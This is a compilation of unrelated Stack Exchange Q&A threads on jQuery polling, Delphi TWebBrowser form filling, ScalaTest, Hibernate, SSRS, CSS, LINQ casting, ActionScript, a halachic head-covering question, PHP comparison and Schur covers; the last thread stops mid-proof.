Q: Using jQuery, I am calling a PHP page with an AJAX call every 60 seconds. The AJAX call hits the PHP script, the PHP script gets the rows from the DB and returns the result, and on success jQuery updates a div with the new data. My question is: can the on-success update detect whether the user is performing an action in that div, and hold off updating it until the action is done? For example, if the rows displayed in the div can be edited in place using jQuery and the user clicks a row to edit it in place, I don't want the div to update with new data until the user is done updating that row. Is that possible in jQuery?

A: It would help to see your actual code, but I would simply suspend that AJAX call whenever a user begins editing and restart it when they're done. If you're using setInterval to start the check every 60 seconds, use clearInterval to abort it.

A: You can catch focus or blur events and set a flag marking the form they're working on as "dirty" (which the AJAX callback would then check before performing any new updates). Or you can rework the UI to hide the edit form until the user indicates they want to make a change (i.e. an update link that exposes the form), then flag "working" until they either save their update or cancel out of the changes. Basically, this is what this site does when you in-line edit a post and try to leave the page: a "Your form is open, are you sure you want to leave the page?" kind of warning.
common-pile/stackexchange_filtered
"Invalid Variant Operation" error when accessing WebBrowser1.OleObject.Document.getElementById('inputLogin').setAttribute

Q: I am using the TWebBrowser component in Delphi XE7 (Windows 7, Internet Explorer 9) to fill a form on a web page. Here is the HTML:

```html
<input name="login" class="form-control" id="inputLogin" placeholder="Username" type="text">
```

I am using this code:

```pascal
WebBrowser1.OleObject.Document.getElementById('InputLogin').setAttribute('value','sometext');
```

It works great on my PC, but on another PC it gives me this error: "Invalid Variant Operation". How can I fix this?

Comment: My guess would be that the other PC is missing a DLL -- either one from your own Delphi project or an MS DLL required by the browser component. Does the other PC have a different browser version? Also, document.getElementById is case sensitive: your ID does not start with a capital "Input...".

A: setAttribute is not the preferred way to set/get the value of an input element. Use the IHTMLInputElement interface to access the value of the target input element, e.g.:

```pascal
uses MSHTML;

var
  el: IHTMLElement;
  inputElement: IHTMLInputElement;

el := (WebBrowser1.Document as IHTMLDocument3).getElementById('inputLogin');
if Assigned(el) then
  if Supports(el, IID_IHTMLInputElement, inputElement) then
    inputElement.value := 'sometext';
```

I could not reproduce the error you got, so if you insist on using setAttribute, you might want to try explicitly setting the interface for the document instead of going through the OleObject.Document Variant, e.g.:

```pascal
el := (WebBrowser1.Document as IHTMLDocument3).getElementById('inputLogin');
if Assigned(el) then
  el.setAttribute('value', 'sometext', 0);
```

Comment: Thank you very much, kobik, it was very helpful. Indeed, using setAttribute was causing the "Invalid Variant" issue (maybe the value was empty). Thank you again; you saved me a lot of time and effort.

Reply: You are welcome. If this answered your question, please accept it. BTW, out of curiosity: did the second approach via el.setAttribute work for you on the other PC?
Yes, it does. It seems that the value of the variant was always null with my first solution.
ParallelTestExecution with FlatSpec, Selenium DSL and Spring I am using Scalatest, FlatSpec, Spring, Selenium DSL and BeforeAndAfterAll. One of these things seems to stop ParallelTestExecution working properly. This is what happens when I run a class with two tests: One Browser opens and does some beforeAll stuff (but not Spring stuff) Another browser opens and does the beforeAll stuff Second browser gets used for first test then closes Another browser opens and does beforeAll stuff followed by second test First and Third browsers close So basically the test runs exactly the same as without ParallelTestExecution except that an extra window has opened? Do you want to accept the answer? Did it work for you? Good point, accepted as it worked thanks. It was an answer from Bill himself so no surprise :) I think you may be observing two different effects. First, ParallelTestExecution extends OneInstancePerTest. It runs each test in its own instance to reduce the likelihood of shared mutable state between tests introducing concurrency Heisenbugs into your tests. But the way it does this is the initial instance of your test class creates an instance for each test and passes those to the distributor (if defined), which will run them in parallel. So since you have two tests, you will get three instances of your test class--the initial instance that runs on the main thread, and the two test-specific instances, one per test, that can run those tests in parallel. Since your beforeAll and afterAll methods have a side effect of creating and closing a web browser, you see that side effect three times. The other thing that may be happening is that ParallelTestExecution will only run tests in parallel if you tell ScalaTest you want parallel execution in general. If you're using Runner, that's done by passing in -P. Otherwise the distributor will not be defined, in which case ParallelTestExecution just executes the tests sequentially on the main thread (the thread that called run). 
ParallelTestExecution is intended for rather rare cases when you actually need to execute tests in the same test class in parallel. An example might be a test class that has lots of very slow tests. In most cases I expect ScalaTest's default approach of running Suites in parallel should give you as good a performance boost as running tests in parallel. To get that kind of parallel execution you need not mix in any trait (i.e., no need for ParallelTestExecution). Just pass -P to Runner, or tell sbt to run ScalaTest in parallel, etc. Also, BeforeAndAfterAll is meant for things that need to happen before and after all tests and nested suites. If you want each test to have its own browser, then you probably want to use BeforeAndAfterEach instead. This would give you just two browsers popping up, not three, in the ParallelTestExecution case. If you really wanted all tests to share the same browser, then I'd check the Selenium documentation to ensure that's possible. It may be that Selenium only lets you do one interaction at a time with a given WebBrowser driver. In summary, if I am guessing correctly what you're really trying to accomplish, I'd drop ParallelTestExecution, change BeforeAndAfterAll to BeforeAndAfterEach (or use withFixture), and pass -P to Runner (directly, via ant or Maven) or ask sbt to run ScalaTest in parallel. Great answer. My tests all test one feature and so IMO belong in one class. Unfortunately each test does different things that take some time, so it would be advantageous if I could get them running in parallel. When I wrote the test I didn't think about ParallelTestExecution, so that's why I used BeforeAndAfterAll. I see now that if I want to use ParallelTestExecution I should use BeforeAndAfterEach. I'll give it a go on Tuesday. Do you know by chance how I enable parallel execution using the scalatest maven plugin and also IntelliJ? This worked perfectly, thanks. Needed to add the -P test parameter in IntelliJ and true in the maven scalatest plugin.
Also needed to add an afterAll method to quit the distributor instance of webdriver.
Hibernate query for multiple items in a collection I have a data model that looks something like this: public class Item { private List<ItemAttribute> attributes; // other stuff } public class ItemAttribute { private String name; private String value; } (this obviously simplifies away a lot of the extraneous stuff) What I want to do is create a query to ask for all Items with one OR MORE particular attributes, ideally joined with arbitrary ANDs and ORs. Right now I'm keeping it simple and just trying to implement the AND case. In pseudo-SQL (or pseudo-HQL if you would), it would be something like: select all items where attributes contains(ItemAttribute(name="foo1", value="bar1")) AND attributes contains(ItemAttribute(name="foo2", value="bar2")) The examples in the Hibernate docs didn't seem to address this particular use case, but it seems like a fairly common one. The disjunction case would also be useful, especially so I could specify a list of possible values, i.e. where attributes contains(ItemAttribute(name="foo", value="bar1")) OR attributes contains(ItemAttribute(name="foo", value="bar2")) -- etc. Here's an example that works OK for a single attribute: return getSession().createCriteria(Item.class) .createAlias("itemAttributes", "ia") .add(Restrictions.conjunction() .add(Restrictions.eq("ia.name", "foo")) .add(Restrictions.eq("ia.attributeValue", "bar"))) .list(); Learning how to do this would go a long ways towards expanding my understanding of Hibernate's potential. :) The answer here works: http://stackoverflow.com/questions/4834372/hibernate-criteria-on-collection-values Could you use aliasing to do this? 
Criteria itemCriteria = session.createCriteria(Item.class); itemCriteria.createAlias("itemAttributes", "ia1") .createAlias("itemAttributes", "ia2") .add(Restrictions.eq("ia1.name", "foo1")) .add(Restrictions.eq("ia1.attributeValue", "bar1")) .add(Restrictions.eq("ia2.name", "foo2")) .add(Restrictions.eq("ia2.attributeValue", "bar2")); Not sure how hibernate handles joining on the same property twice explicitly like that, maybe worth trying? I get an org.hibernate.QueryException: duplicate association path: itemAttributes SELECT item FROM Item item JOIN item.attributes attr WHERE attr IN (:attrList) GROUP BY item and then in the Java code: List<ItemAttribute> attrList = new ArrayList<ItemAttribute>(); attrList.add(..); // add as many attributes as needed ...// create a Query with the above string query.setParameter("attrList", attrList); This looks like it addresses the OR case (i.e. the Item has at least one ItemAttribute that we specify in the attrList), but what about the AND case? Would it be something like WHERE attr1 in item.attributes AND attr2 in item.attributes etc.? Does that even make sense to Hibernate? Also, I appear to be getting a stack trace when trying to do the above. The root error: Caused by: java.lang.IllegalArgumentException: Can not set java.lang.Integer field com.mycompany.domain.ImmutableDomainEntity.id to java.util.ArrayList You are getting an error because you're trying to alias a set (ItemAttributes) to a single entity (attr). You can only use the IN clause with a single entity. A better (working) way would be to invert the query: "SELECT a.item from ItemAttribute a WHERE a.name IN (:attrlist)" - no explicit JOIN is required if you have mapped the relationships properly. That would seem to get me all the Items with the listed attribute names, but now how do I specify the specific values for those attributes? @aarestad AND attr.value IN (:attrValues) Why wouldn't the following work?
return getSession().createCriteria(Item.class) .createAlias("itemAttributes", "ia") .add(Restrictions.or() .add(Restrictions.conjunction() .add(Restrictions.eq("ia.name", "foo1")) .add(Restrictions.eq("ia.attributeValue", "bar1"))) .add(Restrictions.conjunction() .add(Restrictions.eq("ia.name", "foo2")) .add(Restrictions.eq("ia.attributeValue", "bar2")))) .list(); That would be (name=foo1 && attributeValue=bar1) OR (name=foo2 && attributeValue=bar2) This might work for the disjunction, but the conjunction version where I would use Restrictions.and() didn't work. Yes, because that would be saying WHERE x = 1 AND x = 2 essentially, which won't return any results. I can't think of a way to do the conjunction case in raw SQL. You may have to load the disjunction case and then refine that using application logic. I didn't test it, but this is how I should try to solve your problem if I would have to: Map<String,String> map1 = new TreeMap<String,String>(); map1.put("ia.name","foo1"); map1.put("ia.value","bar1"); Map<String,String> map2 = new TreeMap<String,String>(); map2.put("ia.name","foo2"); map2.put("ia.value","bar2"); return getSession().createCriteria(Item.class) .createAlias("itemAttributes", "ia") .add(Restrictions.and() .add(Restrictions.allEq(map1)) .add(Restrictions.allEq(map2)) ) .list(); Please, let me know if it worked. I think the same should work with or()... Use LEFT_OUTER_JOIN to prevent "WHERE x = 1 AND x = 2" kind of issue CreateAlias("itemAttributes", "ia", JoinType.LEFT_OUTER_JOIN)
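Setting Hibernate aside for a moment, the conjunction semantics the question is after ("give me the Items that carry ALL of the listed (name, value) attribute pairs") can be pinned down in plain Java. This is only an in-memory sketch of the intended result set; the Item/ItemAttribute stand-ins below are simplified, invented classes, not the mapped entities or the Criteria API:

```java
import java.util.List;

// Minimal, hypothetical stand-ins for the entities in the question.
class ItemAttribute {
    final String name, value;
    ItemAttribute(String name, String value) { this.name = name; this.value = value; }
    boolean matches(String n, String v) { return name.equals(n) && value.equals(v); }
}

class Item {
    final String id;
    final List<ItemAttribute> attributes;
    Item(String id, List<ItemAttribute> attributes) { this.id = id; this.attributes = attributes; }

    // AND case: the item must carry every requested (name, value) pair.
    boolean hasAll(List<String[]> wanted) {
        return wanted.stream().allMatch(w ->
            attributes.stream().anyMatch(a -> a.matches(w[0], w[1])));
    }
}

public class Demo {
    public static void main(String[] args) {
        Item both = new Item("both", List.of(
            new ItemAttribute("foo1", "bar1"), new ItemAttribute("foo2", "bar2")));
        Item onlyOne = new Item("onlyOne", List.of(new ItemAttribute("foo1", "bar1")));

        List<String[]> wanted = List.of(
            new String[]{"foo1", "bar1"}, new String[]{"foo2", "bar2"});

        for (Item it : List.of(both, onlyOne)) {
            System.out.println(it.id + " -> " + it.hasAll(wanted));
        }
    }
}
```

This also shows why a single alias cannot express the AND case on the SQL side: each joined row carries only one attribute, so no single row can satisfy both equality pairs at once, which is why two aliases or two correlated subqueries are needed.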
reportviewer.getparameters retrieves wrong SSRS parameter dependencies I'm using SSRS 2008R2 in an ASP.NET website and use the ReportViewer control to display it. We have a report with 4 parameters with the following dependencies between them: 1. P2 + P3 depend on P1 2. P4 depends on P3 We used the ReportViewer.Serverreport.getParameters() function to retrieve the ReportParameterInfo collection and got the correct data: P1 - 0 dependencies + 2 dependents P2 - 1 dependencies + 1 dependents P3 - 1 dependencies + 0 dependents P4 - 1 dependencies + 0 dependents Now we wanted to enable the report to serve multiple customers, so we added ServerName + DBName parameters to the report and used them in the report's Data Source, thus making it dynamic. But to my surprise the above function does not retrieve the expected results. I would expect it to say that all the above parameters depend on ServerName + DBName and that the rest of the dependencies would remain as they were, but I'm getting the following result: ServerName - 0 dependencies + 4 dependents - as expected DBName - 0 dependencies + 4 dependents - as expected P1 - 2 dependencies + 3 dependents - **why 3 dependents? should remain 2** P2 - 3 dependencies + 2 dependents - **why 2 dependents? should remain 1** P3 - 4 dependencies + 1 dependents - **why 1 dependents? should remain 0 why 4 dependencies ? should be 3** P4 - 5 dependencies + 0 dependents - **why 5 dependencies ? should be 3** Now, this apparently wrong result causes us a lot of trouble, since we have a great deal of functionality depending on these parameter dependencies. Did anybody encounter something similar? Any ideas? Workarounds?
Using CSS for an image within a border I've got some CSS and HTML that I'm working on, I wanted to sub out the content that is a div block for an image and keep the border with rounded edges with it. But the image isn't showing up when I preview the code. The CSS and HTML are linked correctly. Admittedly, this is just me tinkering to learn more about both CSS and HTML. If you could look at this and give me some insight of how to get the image to show up in the rounded box, I would appreciate it. EDIT: I'm afraid I wasn't entirely clear enough on what the issue was. The image in the title tag and that is associated with the "a.title" css code isn't the issue, that's just a header image. The issue is that I want an image to appear in the div class="content" portion of the HTML with the image source coming from the CSS portion that is div.content. I'm pretty bad at explaining my questions/problems, sorry. But thank you for all of your help thus far! HTML: <html> <head> <title>Some Title</title> <link href="/Volumes/lastname/sitename/css/style.css" rel="stylesheet" type="text/css" media="all"> </head> <body> <div id="container"> <p class="title"><img src="/Volumes/last/sitename/media/header3.png"></img></p> <div class="navbar"> <a class="nav" href="http://www.facebook.com">Facebook</a> <a class="nav" href="http://www.twitter.com">Twitter</a> </div> <div class="content"> </div> </div> </body> </html> Here's the CSS - I know its more of the code than you need to know but here any way: body { background: #ffffff width: 1000px; height: 800px; margin: 0 auto; font-family: "Arial"; } #container { width: 900px; height: 800px; margin: 0 auto; } div.content { background-image: url('/Volumes/last/sitename/media/imagename.jpg') no-repeat; border-style: solid; border-width: 2px; width: 900px; height: 500px; margin-top: -20px; border-radius: 7px; border-color: #a0a0a0; } a.title { margin-top:120px; font-size: 36px; } div.navbar { margin-top: -62px; float: right; font-size: 18px; } 
a.nav { text-decoration: none; color: #717171; padding-right: 20px; } a.nav:hover { color: #1299d6; } div.text { margin-top: 100px; } p.text1 { display: block; text-align: center; } p.text2 { display: block; text-align: center; } p.text3 { display: block; text-align: center; } p.text4 { display: block; text-align: center; } div.links { margin-top: 50px; text-align: center; } a.links { text-decoration: none; color: #ffffff; padding-left: 10px; padding-top: 5px; padding-right: 10px; padding-bottom: 5px; border-radius: 10px; opacity: 0.6; } a.twitter { background: #42a300; } a.contact{ background: #1299d6; } a.subbutton{ background: #690260; } a.links:hover { opacity: 1.0; } First of all, your image tag is wrong. It must be <img src="/Volumes/last/sitename/media/header3.png" /> http://jsfiddle.net/vBRBM/ Test the code. I just switched to this; I got caught up in using CSS to link the image and didn't think to actually have the image in the HTML. Thank you very much for your help. I suspect it could have something to do with the URL. Maybe try the .. notation? It depends on where the picture is in relation to all your other files. body { background-image:url(' *CHANGE THIS* '); background-repeat:no-repeat; background-position:right top; border-style: solid; border-width: 2px; width: 900px; height: 500px; margin-top: -20px; border-radius: 7px; border-color: #a0a0a0; } img tags don't have anything in them, so they don't need a separate closing tag. End it in the same tag by adding the slash on the end /> like <img src="/Volumes/last/sitename/media/imagename.jpg" /> You should take the image out of the div and just make a rule for the class (note that the background shorthand property is needed here; background-image alone does not accept repeat or position values): p.title { background: url('/Volumes/last/sitename/media/imagename.jpg') no-repeat right top; border-style: solid; border-width: 2px; width: 900px; height: 500px; margin-top: -20px; border-radius: 7px; border-color: #a0a0a0; }
Linq - InvalidCastException - Why does "where" not filter the invalid types Had a problem in a complex linq query so I simplified it in LINQPad: void Main() { List<basetype> items = new List<basetype>() { new typeA() { baseproperty = "1", extendedproperty = 1 }, new typeB() { baseproperty = "2", extendedproperty = 1.1 }, new typeA() { baseproperty = "3", extendedproperty = 1 }, }; items.Dump(); (from typeA item in items where item is typeA select item).Dump(); } public abstract class basetype { public string baseproperty { get; set; } public string type { get; set; } } public class typeA : basetype { public int extendedproperty { get; set; } public typeA() { type = "A"; } } public class typeB : basetype { public double extendedproperty { get; set; } public typeB() { type = "B"; } } The first Dump works fine and returns: extendedproperty baseproperty type 1 1 A 1.1 2 B 1 3 A However the second Dump errors with: InvalidCastException: Unable to cast object of type 'typeB' to type 'typeA'. I can fix this by just removing the "typeA" but I wouldn't want to do that in the original statement as I would have to cast the type all over the place: from item in items Interestingly enough, moving the where also fixes this, though you might agree that's a bit ugly: from typeA item in items.Where(i => i is typeA) My question is: why is the original where not filtering out the invalid item before the cast is evaluated? Reason #1: The cast to the type happens before the filter because it comes to the left. In C# it is almost always the case that the thing to the left happens before the thing to the right. Reason #2: Suppose we did it your way. You have a List<object> and you say from string s in myObjects where s.Length > 100 and you get an error saying that object doesn't have a Length property - because of course with your way the cast to string happens after the filter, and therefore the filter cannot depend upon the invariant determined by the cast.
Presumably you put the cast in there because you want to use the properties of the target type. But you can't have it both ways; either the left operation runs first or the right operation runs first. They can't both run first. Reason #3: There already is a way to do what you want: ... from foos.OfType<Bar>() ... That is equivalent to filtering first and then providing a sequence of just the filtered values of the right type. I can understand this is normal code, but when dealing with sets in Linq, much like SQL, it pays to filter the set before operating on each item. It surprises me that Linq does not do this. I would guess that if this were a Linq-to-sql statement it would work. @Chris You seem to be missing the fact that you are defining the filter in your where statement. You are explicitly asking that every item be checked for is typeA. Otherwise the where statement would be moot, because you would iterate over a collection of typeA objects checking whether they are typeA objects. @Jay, not sure I follow your comment. I'm certainly not missing the fact my filter is in the where statement; my issue is that the filter is not applied before the cast. @Chris: I believe the confusion is because there's a cast implied in the from statement as written. The source of the LINQ statement is not items; it's items with each item cast to a typeA. @Chris There is no cast. It is equivalent to foreach (typeA item in items). @Jay, fair point. Maybe I should have said declaration, not cast. @Stephen, I do believe you've hit the nail on the head in that the "from" is the expression "typeA item in items" and not just items. Can you please put that in an answer? The type coercion in both "foreach(X x in xs)" and "from X x in xs" is logically a cast, though no explicit cast operator appears in the source code. In the foreach case, the compiler transforms the code into (X)enumerator.Current, and in the second case, into xs.Cast<X>().
It therefore seems reasonable to refer to both cases as a cast. Why is the original where not filtering out the invalid item before the cast is evaluated? Before the where runs, the from must run. (from typeA item in items You have inadvertently cast in your from expression. Remove the typeA (it is optional) from the from clause and you'll be all set. This is the same as the implicit cast in a foreach statement: foreach(TypeA item in items) //will throw for same reason { if (item is TypeA) I can fix this by just removing the "typeA" but I wouldn't want to do that in the original statement as I would have to cast the type all over the place: You can use either of these solutions: (items.OfType<TypeA>()).Dump(); (from item in items where item is TypeA let itemA = item as TypeA select itemA).Dump(); …in addition to the other answers, note that you can cast the result set in one shot (instead of "all over the place") using .Cast<typeA>() Example: class Program { static void Main(string[] args) { var list = new List<BaseType> {new TypeA(), new TypeB()}; IEnumerable<TypeA> results = list.Where(x => x is TypeA).Cast<TypeA>(); Console.WriteLine("Succeeded. Press any key to quit."); Console.ReadKey(); } public class BaseType{} public class TypeA : BaseType {} public class TypeB : BaseType {} } @David Would you care to elaborate? There is no invalid cast exception in this case.
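The same left-to-right rule exists outside C#. As a rough analogue (not LINQ itself), the filter-then-cast pattern that OfType<T>() encapsulates looks like this in Java streams (Java 16+ for records and toList()):

```java
import java.util.List;

public class OfTypeDemo {
    interface Base {}
    record TypeA(int extended) implements Base {}
    record TypeB(double extended) implements Base {}

    public static void main(String[] args) {
        List<Base> items = List.of(new TypeA(1), new TypeB(1.1), new TypeA(3));

        // Equivalent of LINQ's OfType<TypeA>(): filter first, then downcast.
        List<TypeA> onlyA = items.stream()
                .filter(i -> i instanceof TypeA)
                .map(i -> (TypeA) i)
                .toList();
        System.out.println("count = " + onlyA.size());

        // Casting before filtering throws, just like `from typeA item in items`:
        try {
            items.stream().map(i -> (TypeA) i).forEach(i -> {});
        } catch (ClassCastException e) {
            System.out.println("ClassCastException, as in the LINQ example");
        }
    }
}
```

The ordering mirrors the accepted explanation: the cast in the second pipeline runs on every element before any filtering could happen, so the TypeB element blows up.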
Problem with ActionScript switch not executing first case My problem is that I can't (don't know how to) make my switch work. Here in my first case, I input "hache", and it doesn't pass through. Strangely, in my trace(target); [Object hache] or [Object extincteur] (depending on which mc I click on) comes out... Why doesn't it go through the first case? I have no clue. I tried removing the " ". package cem { import flash.display.MovieClip; public class actionObjets{ /*--inventaire--*/ private static var inventaireHache:Boolean = false; private static var inventaireExtincteur:Boolean = false; private var objetClique:MovieClip; public function actionObjets(target) { this.objetClique = target; switch(objetClique){ case "hache": inventaireHache = true; ajouterInventaire(objetClique); break; case "extincteur": inventaireExtincteur = true; ajouterInventaire(objetClique); break; } trace(target); } private function ajouterInventaire(objetEnlever):void{ objetClique.parent.removeChild(objetClique); trace(inventaireHache + " - Hache"); trace(inventaireExtincteur + " - Extincteur"); } } } By the way, target is the movieClip I clicked on, a.k.a. Object extincteur or Object hache. The problem is that objetClique isn't a string. You probably want to do something like switch (objetClique.name). If you want to understand what's going on, rewrite the code this way: if (objetClique == "hache") { // ... } else if (objetClique == "extincteur") { // ... } I hope this illustrates more clearly why the switch doesn't work. objetClique couldn't be equal to the string "hache", because it's not a string. From the looks of it, objetClique refers to a DisplayObject, and they have a property called name, which is what you want to compare: if (objetClique.name == "hache") { // ... } else if (objetClique.name == "extincteur") { // ... } That code would work, and it's equivalent to a switch that looks like this: switch (objetClique.name) { case "hache": // ... break; case "extincteur": // ... break; } Hummmm!
That's pretty much what I need. Now, my problem is: it traces instance7, instance8 etc... Is there a way to name the instances with real names? nvm... I just did some research. whatiwant.name = "nameiwant". Haha what a noob I am! Thx a lot!! You're a great help! I accept your answer! hehe. If this is Flash you can click on the element on the stage and fill in the name in the name field in one of the inspectors. Otherwise you can just to myDisplayObject.name = "helloworld" wherever you have a display object you want to name.
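The takeaway generalizes beyond ActionScript: a switch compares its subject for equality with each case value, so the subject must be the string-typed name, not the object itself. A minimal Java analogue (the Sprite stand-in and all names here are invented for illustration):

```java
public class SwitchOnName {
    // Stand-in for a display object with a settable name, as in the question.
    static class Sprite {
        String name;
        Sprite(String name) { this.name = name; }
    }

    static String classify(Sprite clicked) {
        // Switching on `clicked` itself would not even compile against string
        // cases; switching on clicked.name is the equivalent of the AS3 fix.
        switch (clicked.name) {
            case "hache":      return "added axe to inventory";
            case "extincteur": return "added extinguisher to inventory";
            default:           return "unknown object";
        }
    }

    public static void main(String[] args) {
        System.out.println(classify(new Sprite("hache")));
        System.out.println(classify(new Sprite("extincteur")));
    }
}
```

Java's static typing rejects the object-vs-string comparison at compile time, whereas AS3 silently evaluated it to false, which is why the original first case never matched.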
Does a woman have to cover her head if she is bald? The Gemara in Ketubot 72a outlines the issue of married woman covering her hair. This issue has been discussed already on this forum. Rav Yehuda Herzl-Henkin has wonderful and thorough treatment of the subject in Bnei Banim, also available in English here. Obviously the topic is very broad, I merely bring these points up as a preface to my question. The question being, it seems that much of the issues of uncovered hair are centered on Ervah, or at least on the notion of hair being meant to be covered. So if a woman doesn't have hair, it would seem that there is no need for her to cover her scalp. Is there any requirement for a bald woman to wear a kerchief on her head, or perhaps does having a bald head itself fulfill the requirement? (In the verse from which we learn the concept of hair-covering, it uses the word ראש/her head, rather than שער/her hair -- perhaps this is pertinent to the answer.) An adjunct to this question would be: if indeed a scalp-cover is not required, why do the many Chasidic women who shave their heads continue to wear a head cover? Is there a Halachic opinion that requires this, or is that a separate issue? Please bring any sources that support your answer. Maybe chasidos cover their heads because of the five-o'clock shadow. More complete baldness is effected by some drugs, most famously many chemotherapeutic drugs. "it seems that all the issues of uncovered hair are centered on Ervah" I disagree with this entirely. Many sources talk about the issue of Ervah from Brachot 24. And many talk about the issue of covering the head from Ketubot 72. Many talk about both because most practical questions are affected by both issues. Hair is only Ervah bc it's usually covered. If there's no hair, then the scalp is usually covered, and it too is then Ervah, like any other part of the body which is usually covered. 
@DoubleAA Although I agree with you that it doesn't all come down to Ervah - that was an oversimplification - the Gemara in Ketubot is certainly talking about covering hair, not heads. And do you have a source to say that if there's no hair, then the scalp is usually covered? Obviously the scalp is usually covered by hair, by default. But what source is there that without hair, the scalp is usually covered? - Nonetheless, I have edited my oversimplification to be more inclusive. Halichos Yisroel page 268:footnote 6 may be relevant (haven't checked it inside) Halachafortodaycom.blogspot.com says that there are two reasons why a married woman covers her hair. Although a bald woman may not have the problem of Erva, she is still required to cover her hair as a sign that she is married. Q: If a married woman is bald, does she still have to wear a headcovering, or is she permitted to reveal her scalp? A: Besides for the reason that hair is considered "Erva" and must be covered, there is also a reason quoted by the Poskim that a married woman covers her hair as a "sign" that she is married, and this would apply to bald women as well. Also, even women that are bald are usually not 100% bald, and some hair is there. "that a married woman covers her hair as a 'sign' that she is married, and this would apply to bald women as well." I don't understand? Covering her scalp is not the sign that she's married. This quote is self-contradictory. Lovely conjecture. Any source brought, or just "the Poskim"? Upon further looking, I see you didn't even quote the full response on that website. The paragraph ends with a final sentence: "For Halacha L'Ma'aseh a rav must be consulted." Telling us that whoever the author is doesn't consider this to be Psak or authoritative.
Why is the string "date" equal to 0? I was just wondering about the code below! I had never seen or heard of this before. Why is the string "date" equal to 0? Is there any documentation for that? <?php $p = "date"; $n = 0; $m = 1; var_dump($p == $n);//true var_dump($p == $m);//false var_dump($n == $m);//false ?> Use === to get false in the first case. And read about comparisons in PHP. Does that mean a string is always equal to 0? @splash58 For future reference: http://stackoverflow.com/questions/80646/how-do-the-php-equality-double-equals-and-identity-triple-equals-comp/80649#80649 When you cast 'date' to int, what other result do you expect? And try $p = "2date"; Yes there is documentation: Read and Learn Yes, you compare a string with an int, so the string is converted to int first. The int from the "date" string is 0. That's how it works: Reference: Manual [See the table] Loose comparisons with == "PHP" == 0 is true "PHP" == 1 is false Strict comparisons with === "PHP" === 0 is false "PHP" === 1 is false So it is with your case of "date" See this: you have used ==, and 0 is an int, so in this case it is going to convert 'date' into int, which is not parseable as one and will become 0. That is why you are getting true. Try the === operator.
Are homomorphisms into PGL related to the Schur multiplier? I've been trying to understand homomorphisms from a finite group $G$ into $\operatorname{PGL}(n,R)$ for $n$ a positive integer, and $R$ a commutative ring with 1, usually a field. I had been under the impression that these were induced by homomorphisms from the Darstellungsgruppen of $G$ into $\operatorname{GL}(n,R)$, but I am having doubts. What is wrong with the following example? Take $G$ to be cyclic of order 2. Its Schur multiplier is trivial, so it is its own Darstellungsgruppe. For $r \in R^\times$, set $a=\begin{bmatrix} 0 & 1 \\ r & 0 \end{bmatrix} \in \operatorname{GL}(2,R)$. Then $a^2 = r a^0 \in Z(\operatorname{GL}(2,R))$ so $\bar a$ has order 2 in $\operatorname{PGL}(2,R)$. Consider the homomorphism from $G$ to $\operatorname{PGL}(2,R)$ that sends a generator to $\bar a$. This is not induced by any homomorphism from a covering group of $G$ to $\operatorname{GL}(2,R)$ as long as $r$ has no square root in $R$. Indeed any such homomorphism is determined by where it sends a generator, say to $b$, and to induce the original homomorphism to PGL $\bar b$ must equal $\bar a$. If $\bar b = \bar a$ then $$b=\zeta a = \begin{bmatrix} 0 & \zeta \\ \zeta r & 0 \end{bmatrix} \quad b^2 = \begin{bmatrix} \zeta^2 r & 0 \\ 0 & \zeta^2 r \end{bmatrix}$$ If we want $b$ to have order 2, then $\zeta^2 r = 1$ and $\zeta^2 = \tfrac{1}{r}$, so if $r$ has no square root in $R^\times$, there is no such $b$. Even if we claim the Darstellungsgruppen is cyclic of order 4 (since $H^2(C_2, R^\times)$ is likely equal to $(R^\times)/(R^\times)^2 \cong C_2$) we still need $\zeta^2r = -1$, but if $-1$ is a square in $R$, then $-r$ also has no square root, and it is still a counterexample. We have $H^2(G,R^\times) \cong {\rm Hom}(M(G),R^\times) \oplus {\rm Ext}(G/G',R^\times)$, where $M(G)$ is the Schur multiplier of $G$. 
If $R^\times$ is divisible (which is true, for example, if $R$ is algebraically closed), then ${\rm Ext}(G/G',R^\times) = 0$, all extensions arise from a homomorphism from $M(G)$ to $R^\times$, and any homomorphism $G \to {\rm PGL}(2,R)$ lifts to $\hat{G} \to {\rm GL}(2,R)$ for some covering group $\hat{G}$ of $G$. But in general this will not be the case. If I really, really wanted a lift for my $G=C_2$, is this telling me I'd need to define $\hat G$ as an extension of the normal subgroup $R^\times$ with quotient $G/G'=C_2$? I think that roughly corresponds to taking a square root of $r$. Such a covering group is not very impressive, as it is not even finite. (I think I roughly have it now, but I have to head out for a few hours. Will accept tomorrow after I have a chance to prove everything and write out the details.) The following is probably a misguided reinvention of Schur covers. It misses two key properties of Schur covers: (1) Schur covers work for all projective representations (over an algebraically closed field simultaneously), and (2) Schur covers have a universal property that makes them minimal. This answer also fails to prove Derek Holt's nice formula (which I assume is the universal coefficients theorem), which loses another important feature: if $G$ is a perfect group, the Schur cover is unique and projective representations (probably) lift over every commutative ring, not just algebraically closed fields. At any rate, these results are enough to show that some sort of covering group exists, and if pressed further, some sort of covering group satisfying (1) is possible as well, though I have no idea if it will satisfy (2). Statements of results A representation group always exists for each projective representation.
That is, Proposition: For every $\newcommand{\PGL}{\operatorname{PGL}}\newcommand{\GL}{\operatorname{GL}}\rho : G \to H$ and surjection $\pi:\hat H \to H$ with abelian kernel, there is a group $\hat G$ and homomorphisms $\phi:\hat G \to G$ and $\hat\rho:\hat G \to \hat H$ such that the following diagram commutes: $$\require{AMScd} \begin{CD} \hat G @>{\hat\rho}>> \hat H \\ @V{\phi}VV @V{\pi}VV \\ G @>{\rho}>> H \end{CD} $$ Proposition: We can always take $\ker(\phi) \cong \ker(\pi)$ if we'd like, but if $G$ is finite and $\ker(\pi)$ is $p$-divisible for each prime $p$ dividing the order of $G$, then we can take $\ker(\phi) \leq \{ k \in \ker(\pi) : k^{|G|} =1 \}$. Corollary: In particular, if $H=\PGL(n,R)$ and $\hat H=\GL(n,R)$ for $R$ an integrally closed order in an algebraically closed field, then we can take $\ker(\phi)$ finite and cyclic. Proofs Proof (of first proposition): We begin with the image of $\hat \rho$: For each $g \in G$, choose some preimage $\mu(g) \in \hat H$ of $\rho(g)$ under $\pi$. Thus $\mu:G \to \hat H$ is a function satisfying $\pi(\mu(g)) = \rho(g)$. 
